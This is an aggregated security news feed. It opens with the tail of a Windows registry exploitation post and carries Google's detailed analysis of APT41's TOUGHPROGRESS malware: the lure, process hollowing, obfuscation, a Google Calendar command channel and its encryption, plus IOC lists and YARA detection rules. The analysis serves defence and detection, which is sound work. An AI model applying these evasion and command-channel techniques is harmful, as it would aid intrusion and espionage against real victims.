HvpReleaseCellPaged, moving it to HvpGetCellPaged should be completely neutral in terms of system performance, and it would fully prevent the use of OOB indexes for any malicious purposes. I suggested this course of action in November 2023, but it hasn't been implemented by the vendor yet, so all the techniques described here still work at the time of publication.False File Immutability So far in this blog, we have mostly focused on a scenario where we can control the internal regf data of an active hive through memory corruption. This is certainly the most likely reason why someone would take control of registry structures, but not necessarily the only one. As I already mentioned in the previous posts, Windows uses section objects and their corresponding section views to map hive files into memory. This means that the mappings are backed by the corresponding files, and if any of them are ever evicted from memory (e.g., due to memory pressure in the system), they will be reloaded from disk the next time they are accessed. Therefore, it is crucial for system security to protect actively loaded hives from being simultaneously written to. This guarantee is achieved in the CmpOpenHiveFile function through the ShareAccess argument passed to ZwCreateFile, which takes a value of 0 or at most FILE_SHARE_READ, but never FILE_SHARE_WRITE. This causes the operating system to ensure that no application can open the file for writing as long as the handle remains open. As I write these words, the research titled False File Immutability, published by Gabriel Landau in 2024, naturally comes to my mind. He effectively demonstrated that for files opened from remote network shares (e.g., via the SMB protocol), guarantees regarding their immutability may not be upheld in practice, as the local computer simply lacks physical control over it. However, the registry implementation is generally prepared for this eventuality: for hives loaded from locations other than the system partition, the HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL and VIEW_MAP_MUST_BE_KEPT_LOCAL flags are used, as discussed in blog post #6. These flags instruct the kernel to keep local copies of each memory page for such hives, never allowing them to be completely evicted and, as a result, having to be read again from remote storage. Thus, the attack vector seems to be correctly addressed. However, during my audit of the registry's memory management implementation last year, I discovered two related vulnerabilities: CVE-2024-43452 and CVE-2024-49114. The second one is particularly noteworthy because, by abusing the Cloud Filter API functionality and its "placeholder files", it was possible to arbitrarily modify active hive files in the system, including those loaded from the C:\ drive. This completely bypassed the sharing access right checks and their associated security guarantees. With this type of issue, the hive corruption exploitation techniques can be used without any actual memory corruption taking place, by simply replacing the memory in question with controlled data. I believe that vulnerabilities of this class can be a real treat for bug hunters, and they are certainly worth remembering for the future.Conclusion Dear reader, if you've made it to the end of this blog post, and especially if you've read all the posts in this series, I'd like to sincerely congratulate you on your perseverance. 🙂 Through these write ups, I hope I've managed to document as many implementation details of the registry as possible; details that might otherwise have never seen the light of day. My goal was to show how interesting and internally complex this mechanism is, and in particular, what an important role it plays in the security of Windows as a whole. Thank you for joining me on this adventure, and see you next time!

https://googleprojectzero.blogspot.com/2025/05/the-windows-registry-adventure-8-exploitation.html
Pakistan Arrests 21 in ‘Heartsender’ Malware Service
2025-05-28T17:41:47Z | 1748454107

Authorities in Pakistan have arrested 21 individuals accused of operating "Heartsender," a once popular spam and malware dissemination service that operated for more than a decade. The main clientele for HeartSender were organized crime groups that tried to trick victim companies into making payments to a third party, and its alleged proprietors were publicly identified by KrebsOnSecurity in 2021 after they inadvertently infected their computers with malware.

https://krebsonsecurity.com/2025/05/pakistan-arrests-21-in-heartsender-malware-service/
Iranian Hacker Pleads Guilty in $19 Million Robbinhood Ransomware Attack on Baltimore
2025-05-28T17:20:00Z | 1748452800

An Iranian national has pleaded guilty in the U.S. over his involvement in an international ransomware and extortion scheme involving the Robbinhood ransomware. Sina Gholinejad (aka Sina Ghaaf), 37, and his co-conspirators are said to have breached the computer networks of various organizations in the United States and encrypted files with Robbinhood ransomware to demand Bitcoin ransom payments....

https://thehackernews.com/2025/05/iranian-hacker-pleads-guilty-in-19.html
Cortex XDR Named 2025 Gartner Customers’ Choice for Endpoint Security
2025-05-28T16:54:28Z | 1748451268

98% of reviewers recommend Palo Alto Networks industry-leading security, Cortex XDR, as Gartner Customers' Choice for Endpoint Protection Platforms. The post Cortex XDR Named 2025 Gartner Customers’ Choice for Endpoint Security appeared first on Palo Alto Networks Blog.

https://www.paloaltonetworks.com/blog/2025/05/cortex-xdr-named-gartner-customers-choice-endpoint-security/
Czech Republic Blames China-Linked APT31 Hackers for 2022 Cyberattack
2025-05-28T16:01:00Z | 1748448060

The Czech Republic on Wednesday formally accused a threat actor associated with the People's Republic of China (PRC) of targeting its Ministry of Foreign Affairs. In a public statement, the government said it identified China as the culprit behind a malicious campaign targeting one of the unclassified networks of the Czech Ministry of Foreign Affairs. The extent of the breach is presently not...

https://thehackernews.com/2025/05/czech-republic-blames-china-linked.html
More than 40% of Fintech Breaches Linked to Third-Party Vendors
2025-05-28T16:00:00Z | 1748448000

More than 40% of breaches in fintech organizations can be linked to third-party vendors.

https://www.securitymagazine.com/articles/101651-more-than-40-of-fintech-breaches-linked-to-third-party-vendors
Craft CMS security advisory (AV25-300)
2025-05-28T15:57:38Z | 1748447858

https://cyber.gc.ca/en/alerts-advisories/craft-cms-security-advisory-av25-300
What’s New in 6.2 Spring Release
2025-05-28T15:39:55Z | 1748446795

The post What’s New in 6.2 Spring Release appeared first on Graylog.

https://graylog.org/resources/whats-new-in-6-2-spring-release/
Understanding Common Vulnerabilities and Exposures (CVEs) and Their Role in Deceptive Threat Detection
2025-05-28T14:43:58Z | 1748443438

Explore common vulnerabilities and exposures to enhance your security practices. Learn how to protect your assets effectively. The post Understanding Common Vulnerabilities and Exposures (CVEs) and Their Role in Deceptive Threat Detection appeared first on Fidelis Security.

https://fidelissecurity.com/threatgeek/threats-and-vulnerabilities/cves-and-deceptive-threat-detection/
Leader of Qakbot Malware Conspiracy Indicted for Involvement in Global Ransomware Scheme
2025-05-28T14:05:51Z | 1748441151

Blogs Blog Leader of Qakbot Malware Conspiracy Indicted for Involvement in Global Ransomware Scheme “A federal indictment unsealed today charges Rustam Rafailevich Gallyamov, 48, of Moscow, Russia, with leading a group of cyber criminals who developed and deployed the Qakbot malware. In connection with the charges, the Justice Department filed today a civil forfeiture complaint against over $24 million […] The post Leader of Qakbot Malware Conspiracy Indicted for Involvement in Global Ransomware Scheme appeared first on Flashpoint.

https://flashpoint.io/blog/leader-of-qakbot-malware-conspiracy-indicted-for-involvement-in-global-ransomware-scheme/
Data broker giant LexisNexis says breach exposed personal information of over 364,000 people
2025-05-28T14:05:01Z | 1748441101

The data collector said the stolen data includes Social Security numbers.

https://techcrunch.com/2025/05/28/data-broker-giant-lexisnexis-says-breach-exposed-personal-information-of-over-364000-people/
Mark Your Calendar: APT41 Innovative Tactics
2025-05-28T14:00:00Z | 1748440800

Written by: Patrick Whitsell Google Threat Intelligence Group’s (GTIG) mission is to protect Google’s billions of users and Google’s multitude of products and services. In late October 2024, GTIG discovered an exploited government website hosting malware being used to target multiple other government entities. The exploited site delivered a malware payload, which we have dubbed “TOUGHPROGRESS”, that took advantage of Google Calendar for command and control (C2). Misuse of cloud services for C2 is a technique that many threat actors leverage in order to blend in with legitimate activity.  We assess with high confidence that this malware is being used by the PRC based actor APT41 (also tracked as HOODOO). APT41’s targets span the globe, including governments and organizations within the global shipping and logistics, media and entertainment, technology, and automotive sectors.  Overview In this blog post we analyze the malware delivery methods, technical details of the malware attack chain, discuss other recent APT41 activities, and share indicators of compromise (IOCs) to help security practitioners defend against similar attacks. We also detail how GTIG disrupted this campaign using custom detection signatures, shutting down attacker-controlled infrastructure, and protections added to Safe Browsing. Figure 1: TOUGHPROGRESS campaign overview Delivery APT41 sent spear phishing emails containing a link to the ZIP archive hosted on the exploited government website. The archive contains an LNK file, masquerading as a PDF, and a directory. Within this directory we find what looks like seven JPG images of arthropods. When the payload is executed via the LNK, the LNK is deleted and replaced with a decoy PDF file that is displayed to the user indicating these species need to be declared for export. $ unzip -l 出境海關申報清單.zip Length Date Time Name --------- ---------- ----- ---- 0 2024-10-23 11:00 image/ 12633 2024-10-23 10:53 image/1.jpg 10282 2024-10-23 10:54 image/2.jpg 8288 2024-10-23 10:54 image/3.jpg 4174 2024-10-23 10:54 image/4.jpg 181656 2024-10-23 10:54 image/5.jpg 997111 2024-10-23 11:00 image/6.jpg 124928 2024-10-23 11:00 image/7.jpg 88604 2024-10-23 11:03 申報物品清單.pdf.lnk --------- ------- 1427676 9 files The files “6.jpg” and “7.jpg” are fake images. The first file is actually an encrypted payload and is decrypted by the second file, which is a DLL file launched when the target clicks the LNK.  Malware Infection Chain This malware has three distinct modules, deployed in series, each with a distinct function. Each module also implements stealth and evasion techniques, including memory-only payloads, encryption, compression, process hollowing, control flow obfuscation, and leveraging Google Calendar for C2. PLUSDROP - DLL to decrypt and execute the next stage in memory. PLUSINJECT - Launches and performs process hollowing on a legitimate “svchost.exe” process, injecting the final payload. TOUGHPROGRESS - Executes actions on the compromised Windows host. Uses Google Calendar for C2.  TOUGHPROGRESS Analysis TOUGHPROGRESS begins by using a hardcoded 16-byte XOR key to decrypt embedded shellcode stored in the sample’s “.pdata” region. The shellcode then decompresses a DLL in memory using COMPRESSION_FORMAT_LZNT1. This DLL layers multiple obfuscation techniques to obscure the control flow.  Register-based Indirect Calls Dynamic Address Arithmetic 64-bit register overflow Function Dispatch Table The registered-based indirect call is used after dynamically calculating the address to store in the register. This calculation involves two or more hardcoded values that intentionally overflow the 64-bit register. Here is an example calling CreateThread. Figure 2: Register-based indirect call with dynamic address arithmetic and 64-bit overflow We can reproduce how this works using Python “ctypes” to simulate 64-bit register arithmetic. Adding the two values together overflows the 64-bit address space and the result is the address of the function to be called. Figure 3: Demonstration of 64-bit address overflow Figure 4: CreateThread in Dispatch Table These obfuscation techniques manifest as a Control Flow Obfuscation tactic. Due to the indirect calls and arithmetic operations, the disassembler cannot accurately recreate a control flow graph. Calendar C2 TOUGHPROGRESS has the capability to read and write events with an attacker-controlled Google Calendar. Once executed, TOUGHPROGRESS creates a zero minute Calendar event at a hardcoded date, 2023-05-30, with data collected from the compromised host being encrypted and written in the Calendar event description.  The operator places encrypted commands in Calendar events on 2023-07-30 and 2023-07-31, which are predetermined dates also hardcoded into the malware. TOUGHPROGRESS then begins polling Calendar for these events. When an event is retrieved, the event description is decrypted and the command it contains is executed on the compromised host. Results from the command execution are encrypted and written back to another Calendar event. In collaboration with the Mandiant FLARE team, GTIG reverse engineered the C2 encryption protocol leveraged by TOUGHPROGRESS. The malware uses a hardcoded 10-byte XOR key and generates a per-message 4-byte XOR key. Compress message with LZNT1 Encrypt the message with a 4-byte XOR key Append the 4-byte key at the end of a message header (10 bytes total) Encrypt the header with the 10-byte XOR key Prepend the encrypted header to the front of the message The combined encrypted header and message is the Calendar event description Figure 5: TOUGHPROGRESS encryption routine for Calendar Event Descriptions Figure 6: Example of a Calendar event created by TOUGHPROGRESS Disrupting Attackers to Protect Google, Our Users, and Our Customers GTIG’s goal is not just to monitor threats, but to counter and disrupt them. At Google, we aim to protect our users and customers at scale by proactively blocking malware campaigns across our products.  To disrupt APT41 and TOUGHPROGRESS malware, we have developed custom fingerprints to identify and take down attacker-controlled Calendars. We have also terminated attacker-controlled Workspace projects, effectively dismantling the infrastructure that APT41 relied on for this campaign. Additionally, we updated file detections and added malicious domains and URLs to the Google Safe Browsing blocklist.  In partnership with Mandiant Consulting, GTIG notified the compromised organizations. We provided the notified organizations with a sample of TOUGHPROGRESS network traffic logs, and information about the threat actor, to aid with detection and incident response. Protecting Against Ongoing Activity GTIG has been actively monitoring and protecting against APT41’s attacks using Workspace apps for several years. This threat group is known for their creative malware campaigns, sometimes leveraging Workspace apps.  Google Cloud’s Office of the CISO published the April 2023 Threat Horizons Report detailing HOODOO’s use of Google Sheets and Google Drive for malware C2. In October 2024, Proofpoint published a report attributing the VOLDEMORT malware family to APT41.  The DUSTTRAP malware family, reported by GTIG and Mandiant in July of 2024, used Public Cloud hosting for C2. In each case, GTIG identified and terminated the attacker-controlled Workspace projects and infrastructure APT41 relied on for these campaigns. Free Web Hosting Infrastructure Since at least August 2024, we have observed APT41 using free web hosting tools for distributing their malware. This includes VOLDEMORT, DUSTTRAP, TOUGHPROGRESS and likely other payloads as well. Links to these free hosting sites have been sent to hundreds of targets in a variety of geographic locations and industries.  APT41 has used Cloudflare Worker subdomains the most frequently. However, we have also observed use of InfinityFree and TryCloudflare. The specific subdomains and URLs here have been observed in previous campaigns, but may no longer be in use by APT41. Cloudflare Workers word[.]msapp[.]workers[.]dev  cloud[.]msapp[.]workers[.]dev  TryCloudflare term-restore-satisfied-hence[.]trycloudflare[.]com ways-sms-pmc-shareholders[.]trycloudflare[.]com InfinityFree resource[.]infinityfreeapp[.]com pubs[.]infinityfreeapp[.]com APT41 has also been observed using URL shorteners in their phishing messages. The shortened URL redirects to their malware hosted on free hosting app subdomains.  https[:]//lihi[.]cc/6dekU https[:]//tinyurl[.]com/hycev3y7 https[:]//my5353[.]com/nWyTf https[:]//reurl[.]cc/WNr2Xy All domains and URLs in this blog post have been added to the Safe Browsing blocklist. This enables a warning on site access and prevents users from downloading the malware.  Indicators of Compromise The IOCs in this blog post are also available as a collection in Google Threat Intelligence. Hashes   Name Hashes (SHA256 / MD5) 出境海關申報清單.zip 469b534bec827be03c0823e72e7b4da0b84f53199040705da203986ef154406a 876fb1b0275a653c4210aaf01c2698ec 申報物品清單.pdf.lnk 3b88b3efbdc86383ee9738c92026b8931ce1c13cd75cd1cda2fa302791c2c4fb 65da1a9026cf171a5a7779bc5ee45fb1 6.jpg 50124174a4ac0d65bf8b6fd66f538829d1589edc73aa7cf36502e57aa5513360 1ca609e207edb211c8b9566ef35043b6 7.jpg 151257e9dfda476cdafd9983266ad3255104d72a66f9265caa8417a5fe1df5d7 2ec4eeeabb8f6c2970dcbffdcdbd60e3 Domains word[.]msapp[.]workers[.]dev  cloud[.]msapp[.]workers[.]dev  term-restore-satisfied-hence[.]trycloudflare[.]com ways-sms-pmc-shareholders[.]trycloudflare[.]com resource[.]infinityfreeapp[.]com  pubs[.]infinityfreeapp[.]com URL Shortener Links https[:]//lihi[.]cc/6dekU https[:]//lihi[.]cc/v3OyQ https[:]//lihi[.]cc/5nlgd https[:]//lihi[.]cc/edcOv https[:]//lihi[.]cc/4z5sh https[:]//tinyurl[.]com/mr42t4yv https[:]//tinyurl[.]com/hycev3y7 https[:]//tinyurl[.]com/mpa2c5wj https[:]//tinyurl[.]com/3wnz46pv https[:]//my5353[.]com/ppOH5 https[:]//my5353[.]com/nWyTf https[:]//my5353[.]com/fPUcX https[:]//my5353[.]com/ZwEkm https[:]//my5353[.]com/vEWiT https[:]//reurl[.]cc/WNr2Xy Calendar 104075625139-l53k83pb6jbbc2qbreo4i5a0vepen41j.apps.googleusercontent.com https[:]//www[.]googleapis[.]com/calendar/v3/calendars/ff57964096cadc1a8733cf566b41c9528c89d30edec86326c723932c1e79ebf0@group.calendar.google.com/events YARA Rules rule G_Backdoor_TOUGHPROGRESS_LNK_1 { meta: author = "GTIG" date_created = "2025-04-29" date_modified = "2025-04-29" md5 = "65da1a9026cf171a5a7779bc5ee45fb1" rev = 1 strings: $marker = { 4C 00 00 00 } $str1 = "rundll32.exe" ascii wide $str2 = ".\\image\\7.jpg,plus" wide $str3 = "%PDF-1" $str4 = "PYL=" condition: $marker at 0 and all of them } rule G_Dropper_PLUSDROP_1 { meta: author = "GTIG" date_created = "2025-04-29" date_modified = "2025-04-29" md5 = "9492022a939d4c727a5fa462590dc0dd" rev = 1 strings: $decrypt_and_launch_payload = { 48 8B ?? 83 ?? 0F 0F B6 ?? ?? ?? 30 04 ?? 48 FF ?? 49 3B ?? 72 ?? 80 [1-5] 00 75 ?? B? 5B 55 D2 56 [0-8] E8 [4-32] 33 ?? 33 ?? FF D? [0-4] FF D? } condition: uint16(0) == 0x5a4d and all of them } Additional YARA Rules This is a second dropper used to launch PLUSDROP in another TOUGHPROGRESS campaign. rule G_Dropper_TOUGHPROGRESS_XML_1 { meta: author = "GTIG" description = "XML lure file used to launch a PLUSDROP dll." md5 = "dccbb41af2fcf78d56ea3de8f3d1a12c" strings: $str1 = "System.Convert.FromBase64String" $str2 = "VirtualAlloc" $str3 = ".InteropServices.Marshal.Copy" $str4 = ".DllImport" $str5 = "kernel32.dll" $str6 = "powrprof.dll" $str7 = ".Marshal.GetDelegateForFunctionPointer" condition: uint16(0)!= 0x5A4D and all of them and filesize > 500KB and filesize < 5MB } PLUSBED is an additional stage observed in other TOUGHPROGRESS campaigns. rule G_Dropper_PLUSBED_2 { meta: author = "GTIG" date_created = "2025-04-29" date_modified = "2025-04-29" md5 = "39a46d7f1ef9b9a5e40860cd5f646b9d" rev = 1 strings: $api1 = { BA 54 B8 B9 1A } $api2 = { BA 78 1F 20 7F } $api3 = { BA 62 34 89 5E } $api4 = { BA 65 62 10 4B } $api5 = { C7 44 24 34 6E 74 64 6C 66 C7 44 24 38 6C 00 FF D0 } condition: uint16(0) != 0x5A4D and all of them }

https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics/
PureHVNC RAT Using Fake High-level Job Offers from Fashion and Beauty Brands
2025-05-28T14:00:00Z | 1748440800

Summary In recent months, the Netskope Threat Labs team has observed several different campaigns delivering the PureHVNC RAT and its plugins. In 2024, the same malware was observed being delivered via a Python chain, and a few days ago, it was also observed using genAI sites to lure victims. In this blog post, we’ll describe […] The post PureHVNC RAT Using Fake High-level Job Offers from Fashion and Beauty Brands appeared first on Netskope.

https://www.netskope.com/blog/purehvnc-rat-using-fake-high-level-job-offers-from-fashion-and-beauty-brands
Microsoft OneDrive File Picker Flaw Grants Apps Full Cloud Access — Even When Uploading Just One File
2025-05-28T13:41:00Z | 1748439660

Cybersecurity researchers have discovered a security flaw in Microsoft's OneDrive File Picker that, if successfully exploited, could allow websites to access a user's entire cloud storage content, as opposed to just the files selected for upload via the tool. "This stems from overly broad OAuth scopes and misleading consent screens that fail to clearly explain the extent of access being granted,...

https://thehackernews.com/2025/05/microsoft-onedrive-file-picker-flaw.html
RiskRecon Recognized in Gartner’s 2025 Market Guide for TPRM Solutions
2025-05-28T13:15:00Z | 1748438100

We’re thrilled to announce that RiskRecon has been recognized in Gartner’s 2025 Market Guide for Third-Party Risk Management (TPRM) Technology Solutions. This recognition is a testament to our continued innovation and leadership in helping organizations manage third-party cyber risk with precision and confidence.

https://blog.riskrecon.com/riskrecon-recognized-in-gartners-2025-market-guide-for-tprm-solutions
Portnox Named Cloud-Based Solution of the Year Runner-Up at 2025 Network Computing Awards
2025-05-28T13:00:22Z | 1748437222

Portnox was also a finalist for Innovation of the Year.   AUSTIN, TX – May 28, 2025 – Portnox, a leading provider of cloud-native, zero trust access control solutions, today announced that Portnox Cloud was named runner-up for Cloud-Based Solution of the Year for the second year in a row at the 2025 Network Computing… The post Portnox Named Cloud-Based Solution of the Year Runner-Up at 2025 Network Computing Awards appeared first on Portnox.

https://www.portnox.com/blog/press-releases/portnox-named-cloud-based-solution-of-the-year-runner-up-at-2025-network-computing-awards/
Where Capability Meets Opportunity: Introducing the Tenable Research Special Operations Team
2025-05-28T13:00:00Z | 1748437200

Meet the elite squad that’s hunting the next major cyberattack. With more than 150 years of combined research experience and expert analysis, the Tenable Research Special Operations team arms organizations with the critical and actionable intelligence necessary to proactively defend the modern attack surface. The digital battlefield is constantly shifting. It's no longer enough to just react. We need to anticipate. Massive data breaches leave consumers exposed to identity thieves, ransomware attacks cripple hospitals, and Nation State actors disrupt critical infrastructure. It's not just about vulnerable software anymore. In our hyper-connected world, from the smart devices in your home to the complex systems running our cities, everything is a potential target. The explosion of cloud services and AI is accelerating this risk, creating countless new windows for cybercriminals and hostile nations to exploit. From software and hardware vulnerabilities, to misconfigurations, compromised identities, overexposed and highly privileged environments, and publicly accessible databases, the threat landscape is everywhere, all at once. As of October 2024, over 240,000 Common Vulnerabilities and Exposures (CVEs) have been tracked through the MITRE CVE program, including many that have significantly impacted consumers, businesses and governments. The volume has historically been too much for security teams to keep up with. Beyond the sheer increase in the volume of traditional vulnerabilities, defenders are faced with an ever-expanding attack surface as enterprises have adopted remote work and new technologies like Generative AI that all contribute to increases in both the number and complexity of exposures that elevate the likelihood of business impacts.But what if there was a team dedicated to seeing these threats coming, understanding the tactics being used by adversaries, and sending early warning signals for what might come next?Introducing the Tenable Research Special Operations (RSO) Team – the next milestone in the evolution of the Research teams and capabilities that Tenable brings to bear, and designed to operate at the forefront of the fight.The "special ops" of cybersecurity: What you need to knowSince 2018, Tenable’s Security Response Team (SRT) has monitored the cybersecurity landscape, aggregating and assessing insights from hundreds of sources daily to provide unique insights via Cyber Exposure Alerts and related advisory content. In that same year, we formalized our reverse engineering efforts, founding the Zero-Day Research team; that team’s research efforts have resulted in the discovery and disclosure of more than 500 zero-day vulnerabilities since its formation. In 2023, we launched the Decision Science Operations team to provide improved support for decision making through quantitative analysis techniques and the application of appropriate technologies augmenting human intelligence and analysis. Today, the RSO team serves as Tenable’s Forward Logistics Element in the threat landscape, providing customers with the analyses and contextualized exposure intelligence required to manage risks to critical business assets. With over 150 years of collective expertise, this hand-picked group of world-class security researchers is united with one mission: to cut through the noise and deliver critical intelligence about the most dangerous cyber threats emerging right now. Uniting the missions of the Tenable Security Response, Zero-Day Research, and Decision Science Operations teams, RSO disseminates timely, accurate, and actionable information about the latest threats and exposures.How? RSO is laser-focused on the "capability meets opportunity" equationCapability: What are the attackers able to do? What tools, resources, and strategies do they have?Opportunity: What weaknesses exist in our systems that attackers can exploit?By analyzing both sides of this equation, the RSO team can predict potential attacks and pinpoint exactly where the biggest points of exposure reside. This isn't just theoretical; it's about providing real-time, actionable insights that can literally save businesses – and potentially, lives – from devastating cyberattacks.The RSO team's research goes beyond generic warnings. Not every risk is created equal. We understand that what’s critical for a power grid isn’t the same as what’s critical for a retail chain. Threat context is key to determining risk levels. Our insights are tailored, helping organizations across different industries and regions prioritize the threats that matter most to their specific operations.Here's what this elite team is digging into – and why you should pay attentionKnown and emergent exploits: Covering the vulnerabilities we already track and finding brand new ones before criminals can weaponize them.Nation-state and cybercriminal tactics: Uncovering the latest moves from sophisticated hacking groups and foreign governments.AI and emerging tech risks: Assessing the hidden dangers in the newest technologies, like advanced AI models (DeepSeek) and cutting-edge coding protocols (Model Context Protocol, Vibe Coding)."Old dog, new tricks" exploits: Discovering how hackers are re-purposing old vulnerabilities for devastating new attacks.The science of decision-making: Providing data-driven insights to help organizations make smarter security choices.New and existing analysis and insights from Tenable RSO can be found on the Tenable Blog, the Tenable Research page and the Tenable Connect Community.Recent research content from the Tenable RSO TeamCVE-2025-32756: Zero-Day Vulnerability in Multiple Fortinet Products Exploited in the WildCVE-2025-4427, CVE-2025-4428: Ivanti Endpoint Manager Mobile (EPMM) Remote Code ExecutionFrequently Asked Questions about Vibe CodingMCP Prompt Injection: Not Just For EvilFrequently Asked Questions About Model Context Protocol (MCP) and Integrating with AI for Agentic ApplicationsDeepSeek Deep Dive Part 1: Creating Malware, Including Keyloggers and RansomwareFrequently Asked Questions About DeepSeek Large Language Model (LLM)Salt Typhoon: An Analysis of Vulnerabilities Exploited by this State-Sponsored ActorMicrosoft Patch Tuesday 2024 Year in ReviewVolt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors

https://www.tenable.com/blog/where-capability-meets-opportunity-introducing-the-tenable-research-special-operations-team
Sådan understøtter Logpoint NIS2-kravene til hændelseshåndtering
2025-05-28T12:50:31Z | 1748436631

18 juni 2025, 10:30 - 11:15 Er din organisation klar til at leve op til de skærpede cybersikkerhedskrav i NIS2-direktivet? Med NIS2 stiller EU nye og mere omfattende krav til cybersikkerheden i både offentlige og private organisationer – særligt dem, der opererer i samfundskritiske sektorer. Det stiller højere krav til overvågning, hændelseshåndtering og [...] The post Sådan understøtter Logpoint NIS2-kravene til hændelseshåndtering appeared first on Logpoint.

https://www.logpoint.com/en/webinars/nis2-krav/
New PumaBot Botnet Targets Linux IoT Devices to Steal SSH Credentials and Mine Crypto
2025-05-28T12:30:00Z | 1748435400

Embedded Linux-based Internet of Things (IoT) devices have become the target of a new botnet dubbed PumaBot. Written in Go, the botnet is designed to conduct brute-force attacks against SSH instances to expand in size and scale and deliver additional malware to the infected hosts. "Rather than scanning the internet, the malware retrieves a list of targets from a command-and-control (C2) server...

https://thehackernews.com/2025/05/new-pumabot-botnet-targets-linux-iot.html
Russian IT pro sentenced to 14 years forced labor for sharing medical data with Ukraine
2025-05-28T12:24:09Z | 1748435049

The latest in a long line of techies to face Putin’s wrath A Russian programmer will face the next 14 years in a "strict-regime" (high-security) penal colony after a regional court ruled he leaked sensitive data to Ukraine.

https://go.theregister.com/feed/www.theregister.com/2025/05/28/russian_it_pro_sentenced_to/
Cisco Duo Reimagines Identity Security to Combat AI Era Threats
2025-05-28T12:00:00Z | 1748433600

New Duo IAM delivers comprehensive identity security that organizations can trustMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-duo-reimagines-identity-security-to-combat-ai-era-threats.html
Meet the new Duo IAM
2025-05-28T12:00:00Z | 1748433600

Duo is officially expanding into the IAM market, bringing our trusted security expertise to an area long overdue for disruption. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/meet-the-new-duo-iam.html
Cisco Duo Reimagines Identity Security to Combat AI Era Threats
2025-05-28T12:00:00Z | 1748433600

New Duo IAM delivers comprehensive identity security that organizations can trustMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-duo-reimagines-identity-security-to-combat-ai-era-threats.html
Cisco Duo Reimagines Identity Security to Combat AI Era Threats
2025-05-28T12:00:00Z | 1748433600

New Duo IAM delivers comprehensive identity security that organizations can trustMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-duo-reimagines-identity-security-to-combat-ai-era-threats.html
Meet the new Duo IAM
2025-05-28T12:00:00Z | 1748433600

Duo is officially expanding into the IAM market, bringing our trusted security expertise to an area long overdue for disruption. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/meet-the-new-duo-iam.html
Stepping Into the Light: Why CISOs Are Replacing Black-Box Security With Open-Source XDR
2025-05-28T12:00:00Z | 1748433600

Open-source doesn’t just offer better tooling — it offers a better way of working.

https://www.securitymagazine.com/articles/101650-stepping-into-the-light-why-cisos-are-replacing-black-box-security-with-open-source-xdr
Water Safety Starts with Perimeter Access Control
2025-05-28T12:00:00Z | 1748433600

Every summer, as the temperature rises across the U.S., families, young children, and other people looking to cool down flock to fill our 10.7 million private and public pools. Yet, what the New York Times calls a ‘public health crisis’ lurks in waiting.

https://www.securitymagazine.com/articles/101653-water-safety-starts-with-perimeter-access-control
From Infection to Access: A 24-Hour Timeline of a Modern Stealer Campaign
2025-05-28T11:25:00Z | 1748431500

Stealer malware no longer just steals passwords. In 2025, it steals live sessions—and attackers are moving faster and more efficiently than ever. While many associate account takeovers with personal services, the real threat is unfolding in the enterprise. Flare’s latest research, The Account and Session Takeover Economy, analyzed over 20 million stealer logs and tracked attacker activity across...

https://thehackernews.com/2025/05/from-infection-to-access-24-hour.html
Cybersecurity in Healthcare: Defending Patient Safety with Deception Technology
2025-05-28T11:00:56Z | 1748430056

Hospitals today are no longer just centers of care. They are intricate digital ecosystems where every function, from diagnostics to discharge, depends on interconnected technology, a fact that makes cybersecurity in healthcare critical. As digital transformation accelerates across the sector, its exposure to cyber risk grows as well. Attacks on healthcare systems have surged dramatically, […] The post Cybersecurity in Healthcare: Defending Patient Safety with Deception Technology appeared first on CounterCraft.

https://www.countercraftsec.com/blog/cybersecurity-in-healthcare/
Mimo Hackers Exploit CVE-2025-32432 in Craft CMS to Deploy Cryptominer and Proxyware
2025-05-28T11:00:00Z | 1748430000

A financially motivated threat actor has been observed exploiting a recently disclosed remote code execution flaw affecting the Craft Content Management System (CMS) to deploy multiple payloads, including a cryptocurrency miner, a loader dubbed Mimo Loader, and residential proxyware. The vulnerability in question is CVE-2025-32432, a maximum severity flaw in Craft CMS that was patched in...

https://thehackernews.com/2025/05/mimo-hackers-exploit-cve-2025-32432-in.html
CISOs bet big on AI tools to reduce mounting cost pressures
2025-05-28T10:30:52Z | 1748428252

AI automation is a top priority for CISOs, though data quality, privacy, and a lack of in-house expertise are common hurdles

https://www.itpro.com/security/cisos-bet-big-on-ai-tools-to-reduce-mounting-cost-pressures
The Importance of Triage in Incident Response
2025-05-28T10:00:55Z | 1748426455

Gamers of a certain age likely remember the video game Asteroids. You played as a little triangular spacecraft shooting at big space rocks that started traveling towards you slowly at first, then gained speed. As you revolved around trying to protect yourself by shooting them, you inevitably had to make some rapid decisions about which […] The post The Importance of Triage in Incident Response appeared first on Graylog.

https://graylog.org/post/the-importance-of-triage-in-incident-response/
Zanubis in motion: Tracing the active evolution of the Android banking malware
2025-05-28T10:00:38Z | 1748426438

A comprehensive historical breakdown of Zanubis' changes, including RC4 and AES encryption, credentials stealing and new targets in Peru, provided by Kaspersky GReAT experts.

https://securelist.com/evolution-of-zanubis-banking-trojan-for-android/116588/
The cost of compromise: Why password attacks are still winning in 2025
2025-05-28T10:00:16Z | 1748426416

Poor password management is responsible for thousands of data breaches, but it doesn’t have to be this way. Sponsored feature  The IT business likes to reinvent things as quickly as possible. Except passwords, that is. We've been using them since Roman times, only now they're digital. They're the fungal skin disease of tech; irritating and hard to get rid of.

https://go.theregister.com/feed/www.theregister.com/2025/05/28/specops_password_attacks_2025/
Conoa and Sysdig: A powerful partnership for comprehensive cloud and container security
2025-05-28T10:00:00Z | 1748426400

Kubernetes has gone from experiment to essential — powering everything from fintech apps to telecom infrastructure and government services. But... The post Conoa and Sysdig: A powerful partnership for comprehensive cloud and container security appeared first on Sysdig.

https://sysdig.com/blog/conoa-and-sysdig-for-comprehensive-cloud-and-container-security/
Vulnerability in hackney open-source project
2025-05-28T10:00:00Z | 1748426400

